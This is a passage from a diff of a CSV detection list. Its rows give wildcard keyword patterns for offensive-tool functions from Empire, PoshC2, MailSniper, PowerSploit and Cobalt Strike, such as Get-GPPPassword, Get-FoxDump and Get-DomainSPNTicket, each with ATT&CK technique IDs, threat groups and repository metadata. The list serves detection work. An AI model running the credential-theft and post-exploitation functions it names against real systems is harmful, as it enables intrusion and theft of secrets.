TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7102","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*Get-DomainSPNTicket*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. 
While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","powerview.ps1","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*Get-DomainSPNTicket*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "*Get-DomainUser -TrustedToAuth | select userprincipalname","offensive_tool_keyword","AD exploitation cheat sheet","msds-allowedtodelegateto*","T1595 - T1590 - T1591 - T1213 - T1039 - T1592","N/A","N/A","N/A","Lateral movement","https://casvancooten.com/posts/2020/11/windows-active-directory-exploitation-cheat-sheet-and-command-reference","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*Get-DXWebcamVideo.ps1*","offensive_tool_keyword","SharpDXWebcam","Utilizing DirectX and DShowNET assemblies to record video from a host's webcam","T1123 - T1059.001 - T1027.002","TA0009 - TA0005 - TA0040","N/A","N/A","POST Exploitation 
tools","https://github.com/snovvcrash/SharpDXWebcam","1","1","N/A","8","1","68","10","2023-07-19T21:09:00Z","2023-07-12T03:26:24Z" -"*Get-ExchangeAccessToken*","offensive_tool_keyword","MailSniper","MailSniper is a penetration testing tool for searching through email in a Microsoft Exchange environment for specific terms (passwords. insider intel. network architecture information. etc.). It can be used as a non-administrative user to search their own email. or by an administrator to search the mailboxes of every user in a domain.","T1114 - T1134.002","TA0005 - TA0006","N/A","N/A","Credential Access","https://github.com/dafthack/MailSniper/blob/master/MailSniper.ps1","1","1","N/A","N/A","10","2625","554","2022-10-20T08:13:33Z","2016-09-08T00:36:51Z" -"*Get-ExoPsAccessToken*","offensive_tool_keyword","MailSniper","MailSniper is a penetration testing tool for searching through email in a Microsoft Exchange environment for specific terms (passwords. insider intel. network architecture information. etc.). It can be used as a non-administrative user to search their own email. or by an administrator to search the mailboxes of every user in a domain.","T1114 - T1134.002","TA0005 - TA0006","N/A","N/A","Credential Access","https://github.com/dafthack/MailSniper/blob/master/MailSniper.ps1","1","1","N/A","N/A","10","2625","554","2022-10-20T08:13:33Z","2016-09-08T00:36:51Z" +"*Get-ExchangeAccessToken*","offensive_tool_keyword","MailSniper","MailSniper is a penetration testing tool for searching through email in a Microsoft Exchange environment for specific terms (passwords. insider intel. network architecture information. etc.). It can be used as a non-administrative user to search their own email. 
or by an administrator to search the mailboxes of every user in a domain.","T1114 - T1134.002","TA0005 - TA0006","N/A","N/A","Credential Access","https://github.com/dafthack/MailSniper/blob/master/MailSniper.ps1","1","1","N/A","N/A","10","2626","554","2022-10-20T08:13:33Z","2016-09-08T00:36:51Z" +"*Get-ExoPsAccessToken*","offensive_tool_keyword","MailSniper","MailSniper is a penetration testing tool for searching through email in a Microsoft Exchange environment for specific terms (passwords. insider intel. network architecture information. etc.). It can be used as a non-administrative user to search their own email. or by an administrator to search the mailboxes of every user in a domain.","T1114 - T1134.002","TA0005 - TA0006","N/A","N/A","Credential Access","https://github.com/dafthack/MailSniper/blob/master/MailSniper.ps1","1","1","N/A","N/A","10","2626","554","2022-10-20T08:13:33Z","2016-09-08T00:36:51Z" "*getExploit.py*","offensive_tool_keyword","getExploit","Python script to explore exploits from exploit-db.com. Exist a similar script in Kali Linux. 
but in difference this python script will have provide more flexibility at search and download time.","T1587 - T1068 - T1211 - T1210 - T1588","TA0006 - TA0002 - TA0009 - TA0003 - TA0008","N/A","N/A","Exploitation tools","https://github.com/Gioyik/getExploit","1","1","N/A","N/A","1","43","27","2015-06-26T16:38:55Z","2015-01-03T03:26:21Z" "*getexploitablesystem*","offensive_tool_keyword","cobaltstrike","PowerView menu for Cobalt Strike","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/tevora-threat/aggressor-powerview","1","1","N/A","10","10","60","17","2018-03-22T00:21:57Z","2018-03-22T00:21:13Z" "*Get-ExploitableSystem*","offensive_tool_keyword","cobaltstrike","PowerView menu for Cobalt Strike","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 
- T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/tevora-threat/aggressor-powerview","1","1","N/A","10","10","60","17","2018-03-22T00:21:57Z","2018-03-22T00:21:13Z" -"*Get-ExploitableSystem*","offensive_tool_keyword","PowerSploit","PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. PowerSploit is comprised of the following modules and scripts","T1059 - T1053 - T1003 - T1114 - T1204","TA0002 - TA0008 - TA0011","N/A","N/A","Frameworks","https://github.com/PowerShellMafia/PowerSploit","1","0","N/A","10","10","10978","4550","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z" -"*Get-ExploitableUnquotedPath*","offensive_tool_keyword","PrivescCheck","Privilege Escalation Enumeration Script for Windows","T1053 - T1088","TA0005 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/itm4n/PrivescCheck","1","1","N/A","N/A","10","2247","370","2023-09-03T15:14:46Z","2020-01-16T12:28:10Z" +"*Get-ExploitableSystem*","offensive_tool_keyword","PowerSploit","PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. 
PowerSploit is comprised of the following modules and scripts","T1059 - T1053 - T1003 - T1114 - T1204","TA0002 - TA0008 - TA0011","N/A","N/A","Frameworks","https://github.com/PowerShellMafia/PowerSploit","1","0","N/A","10","10","10981","4550","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z" +"*Get-ExploitableUnquotedPath*","offensive_tool_keyword","PrivescCheck","Privilege Escalation Enumeration Script for Windows","T1053 - T1088","TA0005 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/itm4n/PrivescCheck","1","1","N/A","N/A","10","2254","370","2023-09-03T15:14:46Z","2020-01-16T12:28:10Z" "*Get-FakeServiceUsers*","offensive_tool_keyword","HoneypotBuster","Microsoft PowerShell module designed for red teams that can be used to find honeypots and honeytokens in the network or at the host","T1083 - T1059.001 - T1112","TA0007 - TA0002","N/A","N/A","Lateral Movement","https://github.com/JavelinNetworks/HoneypotBuster","1","0","N/A","8","3","270","60","2017-12-05T13:03:11Z","2017-07-22T15:40:44Z" -"*Get-FireFoxHistory*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","N/A","N/A","10","7102","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" -"*Get-FoxDump*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7102","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" -"*Get-FoxDump*","offensive_tool_keyword","empire","Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1151","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7102","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" -"*getgppgroups *","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","0","N/A","10","10","1601","312","2023-09-08T05:42:06Z","2018-07-23T08:53:32Z" 
-"*Get-GPPInnerFields*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7102","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" -"*getgpppassword *","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - 
T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","0","N/A","10","10","1601","312","2023-09-08T05:42:06Z","2018-07-23T08:53:32Z" +"*Get-FireFoxHistory*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","N/A","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" 
+"*Get-FoxDump*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*Get-FoxDump*","offensive_tool_keyword","empire","Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1151","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*getgppgroups *","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","0","N/A","10","10","1602","312","2023-09-08T05:42:06Z","2018-07-23T08:53:32Z" 
+"*Get-GPPInnerFields*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*getgpppassword *","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - 
T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","0","N/A","10","10","1602","312","2023-09-08T05:42:06Z","2018-07-23T08:53:32Z" "*Get-GPPPassword -*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" -"*Get-GPPPassword*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - 